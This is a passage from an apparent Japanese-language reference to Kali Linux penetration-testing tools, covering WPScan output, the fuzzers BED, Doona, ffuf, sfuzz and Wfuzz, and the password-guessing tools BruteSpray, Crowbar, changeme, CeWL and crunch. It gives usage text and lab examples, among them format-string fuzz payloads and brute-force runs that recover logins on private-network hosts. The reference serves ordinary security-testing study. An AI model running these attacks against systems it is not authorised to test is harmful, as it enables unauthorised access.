[+] WordPress readme found: http://192.168.11.4/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.11.4/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.9.3 identified (Insecure, released on 2022-04-05).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.11.4/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.9.3'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.11.4/, Match: 'WordPress 5.9.3'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Dec 1 09:32:29 2024
Fuzzing
BED(Bruteforce Exploit Detector)
ソフトウェアにバッファオーバーフローや書式文字列攻撃などの潜在的な脆弱性がないかどうかチェックするためのファジングツールです。
■ 使用方法
root@kali:~# bed --help
Usage:
bed -s <plugin> -t <target> -p <port> -o <timeout> [ depends on the plugin ]
<plugin> = FTP/SMTP/POP/HTTP/IRC/IMAP/PJL/LPD/FINGER/SOCKS4/SOCKS5
<target> = Host to check (default: localhost)
<port> = Port to connect to (default: standard port)
<timeout> = seconds to wait after each test (default: 2 seconds)
use "bed -s <plugin>" to obtain the parameters you need for the plugin.
Only -s is a mandatory switch.
■ 使用例
# SMTPサービスに対してファジングテストを実行
root@kali:~# bed -s smtp -t 192.168.11.4 -u hello@localhost
* Normal tests
+ Buffer overflow testing:
testing: 1 EXPN XAXAX ...........
testing: 2 EHLO XAXAX ...........
testing: 3 MAIL FROM: XAXAX ...........
[...]
+ Formatstring testing:
testing: 1 EXPN XAXAX .......
testing: 2 EHLO XAXAX .......
testing: 3 MAIL FROM: XAXAX
[...]
+ Unicode testing:
testing: 1 EXPN XAXAX .......
testing: 2 EHLO XAXAX .......
testing: 3 MAIL FROM: XAXAX .......
[...]
Doona
ソフトウェアにバッファオーバーフローや書式文字列攻撃などの潜在的な脆弱性がないかどうかチェックするためのファジングツールです。BEDをフォークして作成され、様々な改善が加えられています。
■ 使用方法
root@kali:~# doona --help
Usage: doona.pl [-OPTIONS [-MORE_OPTIONS]] [--] [PROGRAM_ARG1 ...]
The following single-character options are accepted:
With arguments: -m -s -t -o -p -r -u -v -w -x -M -c
Boolean (without arguments): -d -h -k
Options may be merged together. -- stops processing of options.
Space is not required between options and their arguments.
[Now continuing due to backward compatibility and excessive paranoia.
See 'perldoc Getopt::Std' about $Getopt::Std::STANDARD_HELP_VERSION.]
Usage:
./doona.pl -m [module] <options>
-m <module> = DICT/FINGER/FTP/HTTP/HTTP_MORE/HTTP_SP/HTTP_WEBDAV/IMAP/IRC/LPD/NNTP/PJL/POP/PROXY/RTSP/SMTP/SOCKS4/SOCKS5/TFTP/WHOIS
-c <int> = Execute a health check after every <int> fuzz cases
-t <target> = Host to check (default: localhost)
-p <port> = Port to connect to (default: module specific standard port)
-o <timeout> = seconds to wait after each test (default: 2 seconds)
-r <index> = Resumes fuzzing at test case index
-k = Keep trying until server passes a health check
-d = Dump test case to stdout (use in combination with -r)
-M <num> = Exit after executing <num> number of fuzz cases
-h = Help (this text)
use "./doona.pl -m [module] -h" for module specific option.
■ 使用例
root@kali:~# doona -m HTTP -t 192.168.11.4 -o 0
+ Buffer overflow testing
1/39 [XAXAX] ............................................. (45)
2/39 [XAXAX / HTTP/1.0] ............................................. (90)
3/39 [HEAD XAXAX HTTP/1.0] ............................................. (135)
4/39 [HEAD /XAXAX HTTP/1.0] ............................................. (180)
5/39 [HEAD /?XAXAX HTTP/1.0] ............................................. (225)
[...]
+ Formatstring testing
1/39 [XAXAX] ........... (1766)
2/39 [XAXAX / HTTP/1.0] ........... (1777)
3/39 [HEAD XAXAX HTTP/1.0] ........... (1788)
4/39 [HEAD /XAXAX HTTP/1.0] ........... (1799)
5/39 [HEAD /?XAXAX HTTP/1.0] ........... (1810)
[...]
+ Buffer overflow testing
1/532 GET / HTTP/1.0 [XAXAX: XAXAX] ............................................. (2229)
2/532 GET / HTTP/1.0 [User-Agent: XAXAX] ............................................. (2274)
3/532 GET / HTTP/1.0 [Host: XAXAX] ............................................. (2319)
4/532 GET / HTTP/1.0 [Host: XAXAX:80] ............................................. (2364)
5/532 GET / HTTP/1.0 [Host: somehost:XAXAX] ............................................. (2409)
[...]
ffuf
ディレクトリの探索やGET/POSTパラメーターのファジングテストを行います。
■ 使用方法
root@kali:~# ffuf --help
HTTP OPTIONS:
-H Header `"Name: Value"`, separated by colon. Multiple -H flags are accepted.
-X HTTP method to use
-b Cookie data `"NAME1=VALUE1; NAME2=VALUE2"` for copy as curl functionality.
-cc Client cert for authentication. Client key needs to be defined as well for this to work
-ck Client key for authentication. Client certificate needs to be defined as well for this to work
-d POST data
-http2 Use HTTP2 protocol (default: false)
-ignore-body Do not fetch the response content. (default: false)
-r Follow redirects (default: false)
-raw Do not encode URI (default: false)
-recursion Scan recursively. Only FUZZ keyword is supported, and URL (-u) has to end in it. (default: false)
-recursion-depth Maximum recursion depth. (default: 0)
-recursion-strategy Recursion strategy: "default" for a redirect based, and "greedy" to recurse on all matches (default: default)
-replay-proxy Replay matched requests using this proxy.
-sni Target TLS SNI, does not support FUZZ keyword
-timeout HTTP request timeout in seconds. (default: 10)
-u Target URL
-x Proxy URL (SOCKS5 or HTTP). For example: http://127.0.0.1:8080 or socks5://127.0.0.1:8080
GENERAL OPTIONS:
-V Show version information. (default: false)
-ac Automatically calibrate filtering options (default: false)
-acc Custom auto-calibration string. Can be used multiple times. Implies -ac
-ach Per host autocalibration (default: false)
-ack Autocalibration keyword (default: FUZZ)
-acs Custom auto-calibration strategies. Can be used multiple times. Implies -ac
-c Colorize output. (default: false)
-config Load configuration from a file
-json JSON output, printing newline-delimited JSON records (default: false)
-maxtime Maximum running time in seconds for entire process. (default: 0)
-maxtime-job Maximum running time in seconds per job. (default: 0)
-noninteractive Disable the interactive console functionality (default: false)
-p Seconds of `delay` between requests, or a range of random delay. For example "0.1" or "0.1-2.0"
-rate Rate of requests per second (default: 0)
-s Do not print additional information (silent mode) (default: false)
-sa Stop on all error cases. Implies -sf and -se. (default: false)
-scraperfile Custom scraper file path
-scrapers Active scraper groups (default: all)
-se Stop on spurious errors (default: false)
-search Search for a FFUFHASH payload from ffuf history
-sf Stop when > 95% of responses return 403 Forbidden (default: false)
-t Number of concurrent threads. (default: 40)
-v Verbose output, printing full URL and redirect location (if any) with the results. (default: false)
MATCHER OPTIONS:
-mc Match HTTP status codes, or "all" for everything. (default: 200-299,301,302,307,401,403,405,500)
-ml Match amount of lines in response
-mmode Matcher set operator. Either of: and, or (default: or)
-mr Match regexp
-ms Match HTTP response size
-mt Match how many milliseconds to the first response byte, either greater or less than. EG: >100 or <100
-mw Match amount of words in response
FILTER OPTIONS:
-fc Filter HTTP status codes from response. Comma separated list of codes and ranges
-fl Filter by amount of lines in response. Comma separated list of line counts and ranges
-fmode Filter set operator. Either of: and, or (default: or)
-fr Filter regexp
-fs Filter HTTP response size. Comma separated list of sizes and ranges
-ft Filter by number of milliseconds to the first response byte, either greater or less than. EG: >100 or <100
-fw Filter by amount of words in response. Comma separated list of word counts and ranges
INPUT OPTIONS:
-D DirSearch wordlist compatibility mode. Used in conjunction with -e flag. (default: false)
-e Comma separated list of extensions. Extends FUZZ keyword.
-enc Encoders for keywords, eg. 'FUZZ:urlencode b64encode'
-ic Ignore wordlist comments (default: false)
-input-cmd Command producing the input. --input-num is required when using this input method. Overrides -w.
-input-num Number of inputs to test. Used in conjunction with --input-cmd. (default: 100)
-input-shell Shell to be used for running command
-mode Multi-wordlist operation mode. Available modes: clusterbomb, pitchfork, sniper (default: clusterbomb)
-request File containing the raw http request
-request-proto Protocol to use along with raw request (default: https)
-w Wordlist file path and (optional) keyword separated by colon. eg. '/path/to/wordlist:KEYWORD'
OUTPUT OPTIONS:
-debug-log Write all of the internal logging to the specified file.
-o Write output to file
-od Directory path to store matched results to.
-of Output file format. Available formats: json, ejson, html, md, csv, ecsv (or, 'all' for all formats) (default: json)
-or Don\'t create the output file if we don\'t have results (default: false)
■ 使用例
root@kali:~# ffuf -w words.txt -u http://192.168.11.4/FUZZ/
[...]
________________________________________________
:: Method : GET
:: URL : http://192.168.11.4/FUZZ/
:: Wordlist : FUZZ: words.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
[...]
rss [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 4841ms]
wp-content [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 29ms]
admin [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 175ms]
other [Status: 200, Size: 86813, Words: 2396, Lines: 264, Duration: 1484ms]
guide [Status: 200, Size: 86813, Words: 2396, Lines: 264, Duration: 708ms]
storage [Status: 200, Size: 86823, Words: 2396, Lines: 264, Duration: 1318ms]
rss2 [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 265ms]
bottom [Status: 200, Size: 86815, Words: 2396, Lines: 264, Duration: 1504ms]
wp-includes [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 1ms]
website [Status: 200, Size: 86823, Words: 2396, Lines: 264, Duration: 1519ms]
exec [Status: 200, Size: 86805, Words: 2396, Lines: 264, Duration: 1161ms]
rdf [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 134ms]
page1 [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 374ms]
Other [Status: 200, Size: 86813, Words: 2396, Lines: 264, Duration: 1192ms]
building [Status: 200, Size: 86828, Words: 2396, Lines: 264, Duration: 1640ms]
[...]
:: Progress: [87664/87664] :: Job [1/1] :: 43 req/sec :: Duration: [0:40:53] :: Errors: 0 ::
simple fuzz
テスト設定ファイルに基づきファジングテストを行います。
■ 使用方法
root@kali:~# sfuzz -h
Build-prefix: /usr
-h This message.
-V Version information.
networking / output:
-v Verbose output
-q Silent output mode (generally for CLI fuzzing)
-X prints the output in hex
-b Begin fuzzing at the test specified.
-e End testing on failure.
-t Wait time for reading the socket
-S Remote host
-p Port
-T|-U|-O TCP|UDP|Output mode
-R Refrain from closing connections (ie: "leak" them)
-f Config File
-L Log file
-n Create a new logfile after each fuzz
-r Trim the tailing newline
-D Define a symbol and value (X=y).
-l Only perform literal fuzzing
-s Only perform sequence fuzzing
■ 使用例
# テスト設定ファイルを作成
root@kali:~# cat > sfuzz.config << EOF
sequence=A
sequence=%n
sequence=%#123456x
sequence=%s
sequence=%%s
sequence=%20s
sequence=%%20s
sequence=%20x
sequence=%%20x
sequence=%n%n%n%n%n
sequence=%p%p%p%p%p
sequence=%x%x%x%x%x
sequence=%d%d%d%d%d
sequence=%s%s%s%s%s
sequence=%s%p%x%d
sequence=%.1024d
sequence=%.1025d
sequence=%.2048d
sequence=%.2049d
sequence=%.4096d
sequence=%.4097d
sequence=%99999999999s
sequence=%08x
sequence=%%20d
sequence=%%20n
sequence=%%20x
sequence=%%20s
sequence=%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
reqwait=200
maxseqlen=10024
endcfg
GET /FUZZ HTTP/1.0
--
GET / HTTP/1.1
Host: FUZZ
--
EOF
root@kali:~# sfuzz -S 192.168.11.4 -p 80 -T -f sfuzz.config
[...]
[03:53:44] attempting fuzz - 1 (len: 10040).
[03:53:44] info: tx fuzz - (10040 bytes) - scanning for reply.
[03:53:44] read:
HTTP/1.1 414 Request-URI Too Large
Date: Tue, 12 Nov 2024 03:53:44 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 331
Connection: close
Content-Type: text/html; charset=iso-8859-1
[...]
===============================================================================
[03:53:44] attempting fuzz - 2 (len: 10040).
[03:53:44] info: tx fuzz - (10040 bytes) - scanning for reply.
[03:53:45] read:
HTTP/1.1 414 Request-URI Too Large
Date: Tue, 12 Nov 2024 03:53:44 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 331
Connection: close
Content-Type: text/html; charset=iso-8859-1
[...]
===============================================================================
[03:53:55] attempting fuzz - 56 (len: 10047).
[03:53:55] info: tx fuzz - (10047 bytes) - scanning for reply.
[03:53:56] read:
HTTP/1.1 400 Bad Request
Date: Tue, 12 Nov 2024 03:53:55 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
[...]
Wfuzz
指定されたペイロードでファジングテストを行います。
■ 使用方法
root@kali:~# wfuzz --help
Usage: wfuzz [options] -z payload,params <url>
FUZZ, ..., FUZnZ wherever you put these keywords wfuzz will replace them with the values of the specified payload.
FUZZ{baseline_value} FUZZ will be replaced by baseline_value. It will be the first request performed and could be used as a base for filtering.
Options:
-h/--help : This help
--help : Advanced help
--filter-help : Filter language specification
--version : Wfuzz version details
-e <type> : List of available encoders/payloads/iterators/printers/scripts
--recipe <filename> : Reads options from a recipe. Repeat for various recipes.
--dump-recipe <filename> : Prints current options as a recipe
--oF <filename> : Saves fuzz results to a file. These can be consumed later using the wfuzz payload.
-c : Output with colors
-v : Verbose information.
-f filename,printer : Store results in the output file using the specified printer (raw printer if omitted).
-o printer : Show results using the specified printer.
--interact : (beta) If selected,all key presses are captured. This allows you to interact with the program.
--dry-run : Print the results of applying the requests without actually making any HTTP request.
--prev : Print the previous HTTP requests (only when using payloads generating fuzzresults)
--efield <expr> : Show the specified language expression together with the current payload. Repeat for various fields.
--field <expr> : Do not show the payload but only the specified language expression. Repeat for various fields.
-p addr : Use Proxy in format ip:port:type. Repeat option for using various proxies.
Where type could be SOCKS4,SOCKS5 or HTTP if omitted.
-t N : Specify the number of concurrent connections (10 default)
-s N : Specify time delay between requests (0 default)
-R depth : Recursive path discovery being depth the maximum recursion level.
-D depth : Maximum link depth level.
-L,--follow : Follow HTTP redirections
--ip host:port : Specify an IP to connect to instead of the URL\'s host in the format ip:port
-Z : Scan mode (Connection errors will be ignored).
--req-delay N : Sets the maximum time in seconds the request is allowed to take (CURLOPT_TIMEOUT). Default 90.
--conn-delay N : Sets the maximum time in seconds the connection phase to the server to take (CURLOPT_CONNECTTIMEOUT). Default 90.
-A, --AA, --AAA : Alias for -v -c and --script=default,verbose,discover respectively
--no-cache : Disable plugins cache. Every request will be scanned.
--script= : Equivalent to --script=default
--script=<plugins> : Runs script\'s scan. <plugins> is a comma separated list of plugin-files or plugin-categories
--script-help=<plugins> : Show help about scripts.
--script-args n1=v1,... : Provide arguments to scripts. ie. --script-args grep.regex="<A href=\"(.*?)\">"
-u url : Specify a URL for the request.
-m iterator : Specify an iterator for combining payloads (product by default)
-z payload : Specify a payload for each FUZZ keyword used in the form of name[,parameter][,encoder].
A list of encoders can be used, ie. md5-sha1. Encoders can be chained, ie. md5@sha1.
Encoders category can be used. ie. url
Use help as a payload to show payload plugin\'s details (you can filter using --slice)
--zP <params> : Arguments for the specified payload (it must be preceded by -z or -w).
--zD <default> : Default parameter for the specified payload (it must be preceded by -z or -w).
--zE <encoder> : Encoder for the specified payload (it must be preceded by -z or -w).
--slice <filter> : Filter payload\'s elements using the specified expression. It must be preceded by -z.
-w wordlist : Specify a wordlist file (alias for -z file,wordlist).
-V alltype : All parameters bruteforcing (allvars and allpost). No need for FUZZ keyword.
-X method : Specify an HTTP method for the request, ie. HEAD or FUZZ
-b cookie : Specify a cookie for the requests. Repeat option for various cookies.
-d postdata : Use post data (ex: "id=FUZZ&catalogue=1")
-H header : Use header (ex:"Cookie:id=1312321&user=FUZZ"). Repeat option for various headers.
--basic/ntlm/digest auth : in format "user:pass" or "FUZZ:FUZZ" or "domain\FUZ2Z:FUZZ"
--hc/hl/hw/hh N[,N]+ : Hide responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--sc/sl/sw/sh N[,N]+ : Show responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--ss/hs regex : Show/hide responses with the specified regex within the content
--filter <filter> : Show/hide responses using the specified filter expression (Use BBB for taking values from baseline)
--prefilter <filter> : Filter items before fuzzing using the specified expression. Repeat for concatenating filters.
■ 使用例
# 2024/01/01/~2024/12/31のディレクトリ配下のファイルをファイル名リストを使って走査
root@kali:~# wfuzz --filter "c=200" \
-z range --zD 01-12 \
-z range --zD 01-31 \
-z file,db-backups.txt \
-u http://192.168.11.4/2024/FUZZ/FUZ2Z/FUZ3Z
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.11.4/2024/FUZZ/FUZ2Z/FUZ3Z
Total requests: 124992
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000093854: 200 1 L 5 W 128 Ch "10 - 01 - backup.sql.tar.gz"
Bruteforcing and Credential Stuffing
BruteSpray
様々なサービスに対してデフォルトの認証情報が設定されていないかどうかを総当たりでチェックします。
[対応サービス]
- ssh
- ftp
- telnet
- mssql
- postgresql
- imap
- pop3
- smbnt
- smtp
- snmp
- mysql
- vmauthd
- vnc
- mongodb
- nntp
- asterisk
- teamspeak
- oracle
- xmpp
- rdp
■ 使用方法
root@kali:~# brutespray --help
Usage of brutespray:
-C string
Specify a combo wordlist deiminated by ':', example: user1:password
-H string
Target in the format service://host:port, CIDR ranges supported,
default port will be used if not specified
-P Print found hosts parsed from provided host and file arguments
-S List all supported services
-T int
Number of hosts to bruteforce at the same time (default 5)
-f string
File to parse; Supported: Nmap, Nessus, Nexpose, Lists, etc
-o string
Directory containing successful attempts (default "brutespray-output")
-p string
Password or password file to use for bruteforce
-q Suppress the banner
-r int
Amount of times to retry after receiving connection failed (default 3)
-s string
Service type: ssh, ftp, smtp, etc; Default all (default "all")
-t int
Number of threads to use (default 10)
-u string
Username or user list to bruteforce
-w duration
Set timeout of bruteforce attempts (default 5s)
■ 使用例
# ポートスキャンの結果をファイルに出力する
root@kali:~# nmap -oX /root/out.xml 192.168.11.3
[...]
PORT STATE SERVICE
3306/tcp open mysql
[...]
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
# ポートスキャンの結果をもとにブルートフォース攻撃を行う
root@kali:~# brutespray -f /root/out.xml -u /root/wordlist/user.txt -p /root/wordlist/password.txt -t 5
[...]
Attempt mysql on host 192.168.11.3 port 3306 with username admin and password austin1 failed
Attempt mysql on host 192.168.11.3 port 3306 with username admin and password crazy1 failed
Attempt mysql SUCCESS on host 192.168.11.3 port 3306 with username admin and password pass succeeded
Attempt mysql on host 192.168.11.3 port 3306 with username admin and password kristina failed
Attempt mysql on host 192.168.11.3 port 3306 with username admin and password tiger1 failed
[...]
CeWL
指定されたサイトから単語を収集してパスワード解析ツールなどで使用するための単語リストを作成します。
■ 使用方法
root@kali:~# cewl --help
Usage: cewl [OPTIONS] ... <url>
OPTIONS:
-h, --help: Show help.
-k, --keep: Keep the downloaded file.
-d <x>,--depth <x>: Depth to spider to, default 2.
-m, --min_word_length: Minimum word length, default 3.
-x, --max_word_length: Maximum word length, default unset.
-o, --offsite: Let the spider visit other sites.
--exclude: A file containing a list of paths to exclude
--allowed: A regex pattern that path must match to be followed
-w, --write: Write the output to the file.
-u, --ua <agent>: User agent to send.
-n, --no-words: Don\'t output the wordlist.
-g <x>, --groups <x>: Return groups of words as well
--lowercase: Lowercase all parsed words
--with-numbers: Accept words with numbers in as well as just letters
--convert-umlauts: Convert common ISO-8859-1 (Latin-1) umlauts (ä-ae, ö-oe, ü-ue, ß-ss)
-a, --meta: include meta data.
--meta_file file: Output file for meta data.
-e, --email: Include email addresses.
--email_file <file>: Output file for email addresses.
--meta-temp-dir <dir>: The temporary directory used by exiftool when parsing files, default /tmp.
-c, --count: Show the count for each word found.
-v, --verbose: Verbose.
--debug: Extra debug information.
Authentication
--auth_type: Digest or basic.
--auth_user: Authentication username.
--auth_pass: Authentication password.
Proxy Support
--proxy_host: Proxy host.
--proxy_port: Proxy port, default 8080.
--proxy_username: Username for proxy, if required.
--proxy_password: Password for proxy, if required.
Headers
--header, -H: In format name:value - can pass multiple.
<url>: The site to spider.
■ 使用例
# 指定したサイトをもとに4桁の数字のリストを作成
root@kali:~# cewl --min_word_length 4 --max_word_length 4 --with-numbers --depth 0 https://suujikotoba.com/4keta/ | awk '/^[[:digit:]]+$/' | sort > words.txt
root@kali:~# head -n 10 words.txt
0000
0005
0009
0010
0014
0019
0024
0026
0030
0039
[...]
changeme
様々なサービスに対してデフォルトの認証情報が設定されていないかどうかを総当たりでチェックします。
■ 使用方法
root@kali:~# changeme --help
usage: changeme.py [-h] [--all] [--category CATEGORY] [--contributors] [--debug] [--delay DELAY] [--dump] [--dryrun] [--fingerprint] [--fresh]
[--log LOG] [--mkcred] [--name NAME] [--noversion] [--proxy PROXY] [--output OUTPUT] [--oa] [--protocols PROTOCOLS]
[--portoverride] [--redishost REDISHOST] [--redisport REDISPORT] [--resume] [--shodan_query SHODAN_QUERY]
[--shodan_key SHODAN_KEY] [--ssl] [--threads THREADS] [--timeout TIMEOUT] [--useragent USERAGENT] [--validate] [--verbose]
target
positional arguments:
target Target to scan. Can be IP, subnet, hostname, nmap xml file, text file or proto://host:port
options:
-h, --help show this help message and exit
--all, -a Scan for all protocols
--category CATEGORY, -c CATEGORY
Category of default creds to scan for
--contributors Display cred file contributors
--debug, -d Debug output
--delay DELAY, -dl DELAY
Specify a delay in milliseconds to avoid 429 status codes default=500
--dump Print all of the loaded credentials
--dryrun Print urls to be scan, but don\'t scan them
--fingerprint, -f Fingerprint targets, but don\'t check creds
--fresh Flush any previous scans and start fresh
--log LOG, -l LOG Write logs to logfile
--mkcred Make cred file
--name NAME, -n NAME Narrow testing to the supplied credential name
--noversion Don\'t perform a version check
--proxy PROXY, -p PROXY
HTTP(S) Proxy
--output OUTPUT, -o OUTPUT
Name of result file. File extension determines type (csv, html, json).
--oa Output results files in csv, html and json formats
--protocols PROTOCOLS
Comma separated list of protocols to test: http,ssh,ssh_key. Defaults to http.
--portoverride Scan all protocols on all specified ports
--redishost REDISHOST
Redis server
--redisport REDISPORT
Redis server
--resume, -r Resume previous scan
--shodan_query SHODAN_QUERY, -q SHODAN_QUERY
Shodan query
--shodan_key SHODAN_KEY, -k SHODAN_KEY
Shodan API key
--ssl Force cred to SSL and fall back to non-SSL if an SSLError occurs
--threads THREADS, -t THREADS
Number of threads, default=10
--timeout TIMEOUT Timeout in seconds for a request, default=10
--useragent USERAGENT, -ua USERAGENT
User agent string to use
--validate Validate creds files
--verbose, -v Verbose output
■ 使用例
root@kali:~# changeme 192.168.11.4 --all
Loaded 123 default credential profiles
Loaded 398 default credentials
[00:09:28] [+] Found ftp default cred anonymous:None at ftp://192.168.11.4:21
[00:09:28] [+] Found ftp default cred ftp:ftp at ftp://192.168.11.4:21
[00:10:49] Found 2 default credentials
Name Username Password Target Evidence
------ ---------- ---------- ------------------- ----------------------
ftp anonymous ftp://192.168.11.4:21 226 Directory send OK.
ftp ftp ftp ftp://192.168.11.4:21 226 Directory send OK.
Crowbar
RDP(リモートデスクトップ)、OpenVPN、VNC、SSH秘密鍵認証に対してブルートフォース攻撃を行いクレデンシャル情報を特定します。
■ 使用方法
root@kali:~# crowbar --help
positional arguments:
options
options:
-h, --help show this help message and exit
-b {openvpn,rdp,sshkey,vnckey}, --brute {openvpn,rdp,sshkey,vnckey}
Target service
-s SERVER, --server SERVER
Static target
-S SERVER_FILE, --serverfile SERVER_FILE
Multiple targets stored in a file
-u USERNAME [USERNAME ...], --username USERNAME [USERNAME ...]
Static name to login with
-U USERNAME_FILE, --usernamefile USERNAME_FILE
Multiple names to login with, stored in a file
-n THREAD, --number THREAD
Number of threads to be active at once
-l FILE, --log FILE Log file (only write attempts)
-o FILE, --output FILE
Output file (write everything else)
-c PASSWD, --passwd PASSWD
Static password to login with
-C FILE, --passwdfile FILE
Multiple passwords to login with, stored in a file
-t TIMEOUT, --timeout TIMEOUT
[SSH] How long to wait for each thread (seconds)
-p PORT, --port PORT Alter the port if the service is not using the default value
-k KEY_FILE, --keyfile KEY_FILE
[SSH/VNC] (Private) Key file or folder containing multiple files
-m CONFIG, --config CONFIG
[OpenVPN] Configuration file
-d, --discover Port scan before attacking open ports
-v, --verbose Enable verbose output (-vv for more)
-D, --debug Enable debug mode
-q, --quiet Only display successful logins
■ 使用例
# 指定したホストに対してユーザー名とパスワードのリストを使ってRDP接続の総当たりを行う
root@kali:~# crowbar -b rdp -U /root/user.txt -C /root/pass.txt -s 192.168.11.4/32 -v
2024-09-22 06:56:25 START
2024-09-22 06:56:25 Crowbar v0.4.2
2024-09-22 06:56:25 Brute Force Type: rdp
2024-09-22 06:56:25 Output File: /crowbar.out
2024-09-22 06:56:25 Log File: /crowbar.log
2024-09-22 06:56:25 Discover Mode: False
2024-09-22 06:56:25 Verbose Mode: 1
2024-09-22 06:56:25 Debug Mode: False
2024-09-22 06:56:25 Trying 192.168.11.4:3389
2024-09-22 06:56:25 LOG-RDP: 192.168.11.4:3389 - foo:admin
2024-09-22 06:56:25 LOG-RDP: 192.168.11.4:3389 - foo:test
2024-09-22 06:56:25 LOG-RDP: 192.168.11.4:3389 - foo:p@ssw0rd
2024-09-22 06:56:25 LOG-RDP: 192.168.11.4:3389 - bar:admin
2024-09-22 06:56:25 LOG-RDP: 192.168.11.4:3389 - bar:test
2024-09-22 06:56:26 LOG-RDP: 192.168.11.4:3389 - bar:p@ssw0rd
2024-09-22 06:56:26 LOG-RDP: 192.168.11.4:3389 - hello:admin
2024-09-22 06:56:26 LOG-RDP: 192.168.11.4:3389 - hello:p@ssw0rd
2024-09-22 06:56:26 LOG-RDP: 192.168.11.4:3389 - hello:test
2024-09-22 06:56:28 RDP-SUCCESS : 192.168.11.4:3389 - hello:p@ssw0rd
2024-09-22 06:56:28 STOP
crunch
指定した文字セットで単語リストを作成します。
■ 使用方法
root@kali:~# man crunch
SYNOPSIS
crunch <min-len> <max-len> [<charset string>] [options]
OPTIONS
-b number[type]
Specifies the size of the output file, only works if -o START is used, i.e.: 60MB The output files will be in the format of
starting letter-ending letter for example: ./crunch 4 5 -b 20mib -o START will generate 4 files: aaaa-gvfed.txt, gvfee-ombqy.txt,
ombqz-wcydt.txt, wcydu-zzzzz.txt valid values for type are kb, mb, gb, kib, mib, and gib. The first three types are based on
1000 while the last three types are based on 1024. NOTE There is no space between the number and type. For example 500mb is
correct 500 mb is NOT correct.
-c number
Specifies the number of lines to write to output file, only works if -o START is used, i.e.: 60 The output files will be in the
format of starting letter-ending letter for example: ./crunch 1 1 -f /pentest/password/crunch/charset.lst mixalpha-numeric-all-
space -o START -c 60 will result in 2 files: a-7.txt and 8-\ .txt The reason for the slash in the second filename is the ending
character is space and ls has to escape it to print it. Yes you will need to put in the \ when specifying the filename because
the last character is a space.
-d numbersymbol
Limits the number of duplicate characters. -d 2@ limits the lower case alphabet to output like aab and aac. aaa would not be
generated as that is 3 consecutive letters of a. The format is number then symbol where number is the maximum number of consecu‐
tive characters and symbol is the symbol of the the character set you want to limit i.e. @,%^ See examples 17-19.
-e string
Specifies when crunch should stop early
-f /path/to/charset.lst charset-name
Specifies a character set from the charset.lst
-i Inverts the output so instead of aaa,aab,aac,aad, etc you get aaa,baa,caa,daa,aba,bba, etc
-l When you use the -t option this option tells crunch which symbols should be treated as literals. This will allow you to use the
placeholders as letters in the pattern. The -l option should be the same length as the -t option. See example 15.
-m Merged with -p. Please use -p instead.
-o wordlist.txt
Specifies the file to write the output to, eg: wordlist.txt
-p charset OR -p word1 word2 ...
Tells crunch to generate words that don\'t have repeating characters. By default crunch will generate a wordlist size of
#of_chars_in_charset ^ max_length. This option will instead generate #of_chars_in_charset!. The ! stands for factorial. For
example say the charset is abc and max length is 4.. Crunch will by default generate 3^4 = 81 words. This option will instead
generate 3! = 3x2x1 = 6 words (abc, acb, bac, bca, cab, cba). THIS MUST BE THE LAST OPTION! This option CANNOT be used with -s
and it ignores min and max length however you must still specify two numbers.
-q filename.txt
Tells crunch to read filename.txt and permute what is read. This is like the -p option except it gets the input from file‐
name.txt.
-r Tells crunch to resume generate words from where it left off. -r only works if you use -o. You must use the same command as the
original command used to generate the words. The only exception to this is the -s option. If your original command used the -s
option you MUST remove it before you resume the session. Just add -r to the end of the original command.
-s startblock
Specifies a starting string, eg: 03god22fs
-t @,%^
Specifies a pattern, eg: @@god@@@@ where the only the @'s, ,'s, %'s, and ^'s will change.
@ will insert lower case characters
, will insert upper case characters
% will insert numbers
^ will insert symbols
-u
The -u option disables the printpercentage thread. This should be the last option.
-z gzip, bzip2, lzma, and 7z
Compresses the output from the -o option. Valid parameters are gzip, bzip2, lzma, and 7z.
gzip is the fastest but the compression is minimal. bzip2 is a little slower than gzip but has better compression. 7z is slow‐
est but has the best compression.
■ 使用例
# 指定したパターンに数字だけを使った8桁の文字列リストを作成する
root@kali:~# crunch 8 8 -f /usr/share/crunch/charset.lst numeric -o words.txt -t @@-@@@@@
Crunch will now generate the following amount of data: 90000000 bytes
85 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 10000000
root@kali:~# head -n 5 words.txt
00-00000
00-00001
00-00002
00-00003
00-00004
root@kali:~# tail -n 5 words.txt
99-99995
99-99996
99-99997
99-99998
99-99999
hashID
様々なタイプのハッシュを識別します。
■ 使用方法
root@kali:~# hashid --help
usage: hashid.py [-h] [-e] [-m] [-j] [-o FILE] [--version] INPUT
